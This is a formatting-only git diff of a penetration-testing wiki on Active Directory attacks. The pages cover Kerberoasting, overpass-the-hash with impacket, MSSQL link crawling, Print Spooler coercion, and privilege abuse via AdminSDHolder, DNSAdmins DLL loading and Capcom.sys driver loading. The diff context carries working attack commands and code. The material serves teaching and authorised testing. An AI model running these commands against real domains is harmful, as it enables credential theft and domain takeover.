-The goal of **Kerberoasting **is to harvest** TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part **of these TGS **tickets are** **encrypted **with **keys **derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
+The goal of **Kerberoasting** is to harvest **TGS tickets for services that run on behalf of user accounts** in the AD, not computer accounts. Thus, **part** of these TGS **tickets are** **encrypted** with **keys** derived from user passwords. As a consequence, their credentials could be **cracked offline**.\
 You can know that a **user account** is being used as a **service** because the property **"ServicePrincipalName"** is **not null**.
 
 Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.
@@ -56,9 +56,9 @@ If you have **enough permissions** over a user you can **make it kerberoastable*
  Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
 ```
 
-You can find useful **tools **for **kerberoast **attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
+You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
 
-If you find this **error **from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
+If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC: `ntpdate <IP of DC>`
 
 ### Mitigation
 
@@ -79,4 +79,4 @@ Kerberoast is very stealthy if exploitable
 Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
 ```
 
-**More information about Kerberoasting in ired.team in **[**here **](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and **[**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
+**More information about Kerberoasting in ired.team in** [**here** ](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)**and** [**here**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)**.**
diff --git a/windows/active-directory-methodology/kerberos-authentication.md b/windows/active-directory-methodology/kerberos-authentication.md
index 090198bc..2c9724b5 100644
--- a/windows/active-directory-methodology/kerberos-authentication.md
+++ b/windows/active-directory-methodology/kerberos-authentication.md
@@ -1,6 +1,6 @@
 # Kerberos Authentication
 
-**This information was extracted from the post: **[**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)****
+**This information was extracted from the post:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)****
 
 ## Kerberos (I): How does Kerberos work? – Theory
 
@@ -67,15 +67,15 @@ Furthermore, a client can avoid the inclusion of the PAC inside the ticket by sp
 
 Kerberos uses differents kinds of messages. The most interesting are the following:
 
-* **KRB_AS_REQ**: Used to request the TGT to KDC.
-* **KRB_AS_REP**: Used to deliver the TGT by KDC.
-* **KRB_TGS_REQ**: Used to request the TGS to KDC, using the TGT.
-* **KRB_TGS_REP**: Used to deliver the TGS by KDC.
-* **KRB_AP_REQ**: Used to authenticate a user against a service, using the TGS.
-* **KRB_AP_REP**: (Optional) Used by service to identify itself against the user.
-* **KRB_ERROR**: Message to comunicate error conditions.
+* **KRB\_AS\_REQ**: Used to request the TGT to KDC.
+* **KRB\_AS\_REP**: Used to deliver the TGT by KDC.
+* **KRB\_TGS\_REQ**: Used to request the TGS to KDC, using the TGT.
+* **KRB\_TGS\_REP**: Used to deliver the TGS by KDC.
+* **KRB\_AP\_REQ**: Used to authenticate a user against a service, using the TGS.
+* **KRB\_AP\_REP**: (Optional) Used by service to identify itself against the user.
+* **KRB\_ERROR**: Message to comunicate error conditions.
 
-Additionally, even if it is not part of Kerberos, but NRPC, the AP optionally could use the **KERB_VERIFY_PAC_REQUEST** message to send to KDC the signature of PAC, and verify if it is correct.
+Additionally, even if it is not part of Kerberos, but NRPC, the AP optionally could use the **KERB\_VERIFY\_PAC\_REQUEST** message to send to KDC the signature of PAC, and verify if it is correct.
 
 Below is shown a summary of message sequency to perform authentication
 
@@ -85,28 +85,28 @@ Below is shown a summary of message sequency to perform authentication
 
 In this section, the sequency of messages to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.
 
-**KRB_AS_REQ**
+**KRB\_AS\_REQ**
 
-Firstly, user must get a TGT from KDC. To achieve this, a KRB_AS_REQ must be sent:
+Firstly, user must get a TGT from KDC. To achieve this, a KRB\_AS\_REQ must be sent:
 
-![KRB_AS_REQ schema message](<../../.gitbook/assets/image (175).png>)
+![KRB\_AS\_REQ schema message](<../../.gitbook/assets/image (175).png>)
 
-_KRB_AS_REQ_ has, among others, the following fields:
+_KRB\_AS\_REQ_ has, among others, the following fields:
 
 * A encrypted **timestamp** with client key, to authenticate user and prevent replay attacks
 * **Username** of authenticated user
 * The service **SPN** asociated with **krbtgt** account
 * A **Nonce** generated by the user
 
-Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT_REQ_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_ _flag is set in user account.
+Note: the encrypted timestamp is only necessary if user requires preauthentication, which is common, except if [_DONT\_REQ\_PREAUTH_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro) __ flag is set in user account.
 
-**KRB_AS_REP**
+**KRB\_AS\_REP**
 
-After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a _KRB_AS_REP_:
+After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, then it must respond with a _KRB\_AS\_REP_:
 
-![KRB_AS_REP schema message](<../../.gitbook/assets/image (176).png>)
+![KRB\_AS\_REP schema message](<../../.gitbook/assets/image (176).png>)
 
-_KRB_AS_REP_ includes the next information:
+_KRB\_AS\_REP_ includes the next information:
 
 * **Username**
 * **TGT**, which includes:
@@ -121,13 +121,13 @@ _KRB_AS_REP_ includes the next information:
 
 Once finished, user already has the TGT, which can be used to request TGSs, and afterwards access to the services.
 
-**KRB_TGS_REQ**
+**KRB\_TGS\_REQ**
 
-In order to request a TGS, a _KRB_TGS_REQ_ message must be sent to KDC:
+In order to request a TGS, a _KRB\_TGS\_REQ_ message must be sent to KDC:
 
-![KRB_TGS_REQ schema message](<../../.gitbook/assets/image (177).png>)
+![KRB\_TGS\_REQ schema message](<../../.gitbook/assets/image (177).png>)
 
-_KRB_TGS_REQ_ includes:
+_KRB\_TGS\_REQ_ includes:
 
 * **Encrypted data** with session key:
   * **Username**
@@ -136,13 +136,13 @@ _KRB_TGS_REQ_ includes:
 * **SPN** of requested service
 * **Nonce** generated by user
 
-**KRB_TGS_REP**
+**KRB\_TGS\_REP**
 
-After receiving the _KRB_TGS_REQ_ message, the KDC returns a TGS inside of _KRB_TGS_REP_:
+After receiving the _KRB\_TGS\_REQ_ message, the KDC returns a TGS inside of _KRB\_TGS\_REP_:
 
-![KRB_TGS_REP schema message](<../../.gitbook/assets/image (178).png>)
+![KRB\_TGS\_REP schema message](<../../.gitbook/assets/image (178).png>)
 
-_KRB_TGS_REP_ includes:
+_KRB\_TGS\_REP_ includes:
 
 * **Username**
 * **TGS**, which contains:
@@ -155,20 +155,20 @@ _KRB_TGS_REP_ includes:
   * **Expiration date** of TGS
   * User **nonce**, to prevent replay attacks
 
-**KRB_AP_REQ**
+**KRB\_AP\_REQ**
 
-To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a _KRB_AP_REQ_ message:
+To finish, if everything went well, the user already has a valid TGS to interact with service. In order to use it, user must send to the AP a _KRB\_AP\_REQ_ message:
 
-![KRB_AP_REQ schema message](<../../.gitbook/assets/image (179).png>)
+![KRB\_AP\_REQ schema message](<../../.gitbook/assets/image (179).png>)
 
-_KRB_AP_REQ_ includes:
+_KRB\_AP\_REQ_ includes:
 
 * **TGS**
 * **Encrypted data** with service session key:
   * **Username**
   * **Timestamp**, to avoid replay attacks
 
-After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB_AP_REP_ message.
+After that, if user privileges are rigth, this can access to service. If is the case, which not usually happens, the AP will verify the PAC against the KDC. And also, if mutual authentication is needed it will respond to user with a _KRB\_AP\_REP_ message.
 
 ### References
 
@@ -185,7 +185,7 @@ After that, if user privileges are rigth, this can access to service. If is the
 * OverPass The Hash – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash](https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash)
 * Pass The Ticket – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos](https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos)
 * Golden Ticket – Gentilkiwi Blog: [https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos](https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos)
-* Mimikatz Golden Ticket Walkthrough: [https://www.beneaththewaves.net/Projects/Mimikatz\_20\_-\_Golden_Ticket_Walkthrough.html](https://www.beneaththewaves.net/Projects/Mimikatz\_20\_-\_Golden_Ticket_Walkthrough.html)
+* Mimikatz Golden Ticket Walkthrough: [https://www.beneaththewaves.net/Projects/Mimikatz\_20\_-\_Golden\_Ticket\_Walkthrough.html](https://www.beneaththewaves.net/Projects/Mimikatz\_20\_-\_Golden\_Ticket\_Walkthrough.html)
 * Attacking Kerberos: Kicking the Guard Dog of Hades: [https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf](https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin\(1\).pdf)
 * Kerberoasting – Part 1: [https://room362.com/post/2016/kerberoast-pt1/](https://room362.com/post/2016/kerberoast-pt1/)
 * Kerberoasting – Part 2: [https://room362.com/post/2016/kerberoast-pt2/](https://room362.com/post/2016/kerberoast-pt2/)
diff --git a/windows/active-directory-methodology/mssql-trusted-links.md b/windows/active-directory-methodology/mssql-trusted-links.md
index 23379740..2a11420a 100644
--- a/windows/active-directory-methodology/mssql-trusted-links.md
+++ b/windows/active-directory-methodology/mssql-trusted-links.md
@@ -2,8 +2,8 @@
 
 ## MSSQL Trusted Links
 
-If a user has privileges to** access MSSQL instances**, he could be able to use it to** execute commands** in the MSSQL host (if running as SA). \
-Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to** use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
+If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA). \
+Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to **use the trust relationship to execute queries also in the other instance**. This trusts can be chained and at some point the user might be able to find some misconfigured database where he can execute commands.
 
 **The links between databases work even across forest trusts.**
 
@@ -70,11 +70,11 @@ msf> use exploit/windows/mssql/mssql_linkcrawler
 [msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
 ```
 
-Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE `method **manually **to execute commands, see more below.)
+Notice that metasploit will try to abuse only the `openquery()` function in MSSQL (so, if you can't execute command with `openquery()` you will need to try the `EXECUTE` method **manually** to execute commands, see more below.)
 
 ### Manual - Openquery()
 
-From Linux you could obtain a MSSQL console shell with **sqsh** and** mssqlclient.py** and run queries like:
+From Linux you could obtain a MSSQL console shell with **sqsh** and **mssqlclient.py** and run queries like:
 
 ```bash
 select * from openquery("DOMINIO\SERVER1",'select * from openquery("DOMINIO\SERVER2",''select * from master..sysservers'')')
diff --git a/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 21974fa7..69c42651 100644
--- a/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/windows/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -4,7 +4,7 @@
 
 This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.
 
-In order to perform this attack, the** NTLM hash (or password) of the target user account is needed**. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to **access **any service or machine** where the user account has permissions**.
+In order to perform this attack, the **NTLM hash (or password) of the target user account is needed**. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to **access** any service or machine **where the user account has permissions**.
 
 ```
 python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
@@ -12,7 +12,7 @@ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
 python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
 ```
 
-You can **specify **`-aesKey [AES key]` to specify to use **AES256**. \
+You can **specify** `-aesKey [AES key]` to specify to use **AES256**. \
 You can also use the ticket with other tools like: as smbexec.py or wmiexec.py
 
 Possible problems:
diff --git a/windows/active-directory-methodology/printers-spooler-service-abuse.md b/windows/active-directory-methodology/printers-spooler-service-abuse.md
index 60458ecc..f78b0fb2 100644
--- a/windows/active-directory-methodology/printers-spooler-service-abuse.md
+++ b/windows/active-directory-methodology/printers-spooler-service-abuse.md
@@ -2,8 +2,8 @@
 
 ## Spooler Service Abuse
 
-If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request **to the Domain Controller’s print server an **update **on new print jobs and just tell it to **send the notification to some system**.\
-Note when printer send the notification to an arbitrary systems, it needs to **authenticate against **that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
+If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
+Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
 
 ### Finding Windows Servers on the domain
 
@@ -45,7 +45,7 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
 
 ### Combining with Unconstrained Delegation
 
-If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT **of the **computer account of the printer** will be **saved in** the **memory **of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
+If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
 
 ## Inside Windows
 
diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
index 53c378fc..a568504a 100644
--- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
+++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
@@ -10,11 +10,11 @@ There are other account memberships and access token privileges that can also be
 
 ## AdminSDHolder  group
 
-The Access Control List (ACL) of the **AdminSDHolder **object is used as a template to **copy** **permissions **to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.\
-By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder **for example giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\
+The Access Control List (ACL) of the **AdminSDHolder** object is used as a template to **copy** **permissions** to **all “protected groups”** in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.\
+By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group **AdminSDHolder** for example giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour).\
 And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group.
 
-Add a user to the **AdminSDHolder **group:
+Add a user to the **AdminSDHolder** group:
 
 ```csharp
 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
@@ -30,7 +30,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
 
 ****[**More information in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)****
 
-## Account Operators <a href="account-operators" id="account-operators"></a>
+## Account Operators <a href="#account-operators" id="account-operators"></a>
 
 * Allows creating non administrator accounts and groups on the domain
 * Allows logging in to the DC locally
@@ -47,7 +47,7 @@ As well as login to DC01 locally:
 
 ![](../../.gitbook/assets/a3.png)
 
-## Server Operators <a href="server-operators" id="server-operators"></a>
+## Server Operators <a href="#server-operators" id="server-operators"></a>
 
 This membership allows users to configure Domain Controllers with the following privileges:
 
@@ -71,7 +71,7 @@ The story changes:
 
 ![](../../.gitbook/assets/a6.png)
 
-## Backup Operators <a href="backup-operators" id="backup-operators"></a>
+## Backup Operators <a href="#backup-operators" id="backup-operators"></a>
 
 As with `Server Operators` membership, we can access the `DC01` file system if we belong to `Backup Operators`:
 
@@ -81,8 +81,8 @@ As with `Server Operators` membership, we can access the `DC01` file system if w
 
 ### Resume
 
-A user who is member of the **DNSAdmins **group or have **write privileges to a DNS** server object can load an **arbitrary DLL **with **SYSTEM **privileges on the **DNS server**.\
-This is really interesting as the** Domain Controllers** are used very frequently as DNS servers.
+A user who is member of the **DNSAdmins** group or have **write privileges to a DNS** server object can load an **arbitrary DLL** with **SYSTEM** privileges on the **DNS server**.\
+This is really interesting as the **Domain Controllers** are used very frequently as DNS servers.
 
 ### Execute
 
@@ -93,7 +93,7 @@ dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.d
 dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
 ```
 
-An example of a valid DLL can be found in [https://github.com/kazkansouh/DNSAdmin-DLL](https://github.com/kazkansouh/DNSAdmin-DLL). I would change the code of the function `DnsPluginInitialize ` to something like:
+An example of a valid DLL can be found in [https://github.com/kazkansouh/DNSAdmin-DLL](https://github.com/kazkansouh/DNSAdmin-DLL). I would change the code of the function `DnsPluginInitialize` to something like:
 
 ```c
 DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
@@ -103,9 +103,9 @@ DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunct
 }
 ```
 
-So, when the **DNSservice **start or restart, a new user will be created.
+So, when the **DNSservice** start or restart, a new user will be created.
 
-Even having a user inside DNSAdmin group you **by default cannot stop and restart the DNS service. **But you can always try doing:
+Even having a user inside DNSAdmin group you **by default cannot stop and restart the DNS service.** But you can always try doing:
 
 ```csharp
 sc.exe \\dc01 stop dns
@@ -126,24 +126,24 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
 
 ## Group Managed Service Accounts (gMSA)
 
- In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced  **Managed Service Accounts:**
+&#x20;In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced  **Managed Service Accounts:**
 
-* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date. 
+* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.&#x20;
   * It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
 * It cannot be lock out or use for interactive login
 * Supports to share across multiple hosts
 * Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
-* Simplified SPN Management – System will automatically change the SPN value if** sAMaccount** details of the computer change or DNS name property change.
+* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.
 
- gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets **by the DC’s every 30 days, are **retrievable **by **authorized administrators **and by the **servers **who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS **or when the authentication type is ‘Sealing & Secure’ for an example.
+&#x20;gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.
 
 ![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)
 
-So, if gMSA is being used, find if it has** special privileges** and also check if you have **permissions** to **read **the password of the services.
+So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.
 
-Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read **the **password **of **gMSA**.
+Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
 
-## SeLoadDriverPrivilege <a href="seloaddriverprivilege" id="seloaddriverprivilege"></a>
+## SeLoadDriverPrivilege <a href="#seloaddriverprivilege" id="seloaddriverprivilege"></a>
 
 A very dangerous privilege to assign to any user - it allows the user to load kernel drivers and execute code with kernel privilges aka `NT\System`. See how `offense\spotless` user has this privilege:
 
@@ -207,7 +207,7 @@ We compile the above, execute and the privilege `SeLoadDriverPrivilege` is now e
 
 ![](../../.gitbook/assets/a10.png)
 
-### Capcom.sys Driver Exploit <a href="capcom-sys-driver-exploit" id="capcom-sys-driver-exploit"></a>
+### Capcom.sys Driver Exploit <a href="#capcom-sys-driver-exploit" id="capcom-sys-driver-exploit"></a>
 
 To further prove the `SeLoadDriverPrivilege` is dangerous, let's **exploit it to elevate privileges**.
 
@@ -221,13 +221,13 @@ NTSTATUS NTLoadDriver(
 
 By default the driver service name should be under `\Registry\Machine\System\CurrentControlSet\Services\`
 
-But, according with to the **documentation **you **could **also **use **paths under **HKEY_CURRENT_USER**, so you could **modify** a **registry **there to **load arbitrary drivers** on the system.\
+But, according with to the **documentation** you **could** also **use** paths under **HKEY\_CURRENT\_USER**, so you could **modify** a **registry** there to **load arbitrary drivers** on the system.\
 The relevant parameters that must be defined in the new registry are:
 
-* **ImagePath: **REG_EXPAND_SZ type value which specifies the driver path. In this context, the path should be a directory with modification permissions by the non-privileged user.
-* **Type**: Value of type REG_WORD in which the type of the service is indicated. For our purpose, the value should be defined as SERVICE_KERNEL_DRIVER (0x00000001).
+* **ImagePath:** REG\_EXPAND\_SZ type value which specifies the driver path. In this context, the path should be a directory with modification permissions by the non-privileged user.
+* **Type**: Value of type REG\_WORD in which the type of the service is indicated. For our purpose, the value should be defined as SERVICE\_KERNEL\_DRIVER (0x00000001).
 
-Therefore you could create a new registry in **`\Registry\User\<User-SID>\System\CurrentControlSet\MyService`** indicating in **ImagePath **the path to the driver and in **Type **the with value 1 and use those values on the exploit (you can obtain the User SID using: `Get-ADUser -Identity 'USERNAME' | select SID` or `(New-Object System.Security.Principal.NTAccount("USERNAME")).Translate([System.Security.Principal.SecurityIdentifier]).value`
+Therefore you could create a new registry in **`\Registry\User\<User-SID>\System\CurrentControlSet\MyService`** indicating in **ImagePath** the path to the driver and in **Type** the with value 1 and use those values on the exploit (you can obtain the User SID using: `Get-ADUser -Identity 'USERNAME' | select SID` or `(New-Object System.Security.Principal.NTAccount("USERNAME")).Translate([System.Security.Principal.SecurityIdentifier]).value`
 
 ```bash
 PCWSTR pPathSource = L"C:\\experiments\\privileges\\Capcom.sys";
@@ -235,9 +235,9 @@ PCWSTR pPathSourceReg = L"\\Registry\\User\\<User-SID>\\System\\CurrentControlSe
 ```
 
 The first one declares a string variable indicating where the vulnerable **Capcom.sys** driver is located on the victim system and the second one is a string variable indicating a service name that will be used (could be any service).\
-Note, that the** driver must be signed by Windows** so you cannot load arbitrary drivers. But, **Capcom.sys** **can be abused to execute arbitrary code and is signed by Windows**, so the goal is to load this driver and exploit it.
+Note, that the **driver must be signed by Windows** so you cannot load arbitrary drivers. But, **Capcom.sys** **can be abused to execute arbitrary code and is signed by Windows**, so the goal is to load this driver and exploit it.
 
- Load the driver:
+&#x20;Load the driver:
 
 ```c
 #include "stdafx.h"
@@ -338,13 +338,13 @@ You can download exploits from [https://github.com/tandasat/ExploitCapcom](https
 
 ### Auto
 
-You can use [https://github.com/TarlogicSecurity/EoPLoadDriver/](https://github.com/TarlogicSecurity/EoPLoadDriver/) to **automatically enable **the **privilege**, **create **the **registry key **under HKEY_CURRENT_USER and **execute NTLoadDriver **indicating the registry key that you want to create and the path to the driver:
+You can use [https://github.com/TarlogicSecurity/EoPLoadDriver/](https://github.com/TarlogicSecurity/EoPLoadDriver/) to **automatically enable** the **privilege**, **create** the **registry key** under HKEY\_CURRENT\_USER and **execute NTLoadDriver** indicating the registry key that you want to create and the path to the driver:
 
 ![](<../../.gitbook/assets/image (289).png>)
 
 Then, you will need to download a **Capcom.sys** exploit and use it to escalate privileges.
 
-## References <a href="references" id="references"></a>
+## References <a href="#references" id="references"></a>
 
 {% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}
 
diff --git a/windows/active-directory-methodology/resource-based-constrained-delegation.md b/windows/active-directory-methodology/resource-based-constrained-delegation.md
index c61289a4..109ab039 100644
--- a/windows/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/windows/active-directory-methodology/resource-based-constrained-delegation.md
@@ -2,34 +2,34 @@
 
 ## Basics of Resource-based Constrained Delegation
 
-This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead **of giving permissions to an **object **to **impersonate any user against a service**. Resource-based Constrain Delegation **sets **in** the object who is able to impersonate any user against it**.
+This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
 
-In this case, the constrained object will have an attribute called_** msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
+In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
 
-Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account **(_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_)** **can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity **_(In the other forms of Delegation you needed domain admin privs).
+Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) **** can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
 
 ### New Concepts
 
-Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation **_flag inside the _userAccountControl _ value of the user is needed to perform a **S4U2Self. **But that's not completely truth.\
-The reality is that even without that value, you can perform a **S4U2Self **against any user if you are a **service **(have a SPN) but, if you **have **_**TrustedToAuthForDelegation ** _the returned TGS will be **Forwardable **and if you **don't have** that flag the returned TGS **won't **be **Forwardable**.
+Back in Constrained Delegation it was told that the _**TrustedToAuthForDelegation**_ flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.\
+The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** (have a SPN) but, if you **have **_**TrustedToAuthForDelegation**  _ the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
 
-However, if the **TGS **used in **S4U2Proxy **is **NOT Forwardable** trying to abuse a **basic Constrain Delegation **it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work **(this is not a vulnerability, it's a feature, apparently).
+However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** (this is not a vulnerability, it's a feature, apparently).
 
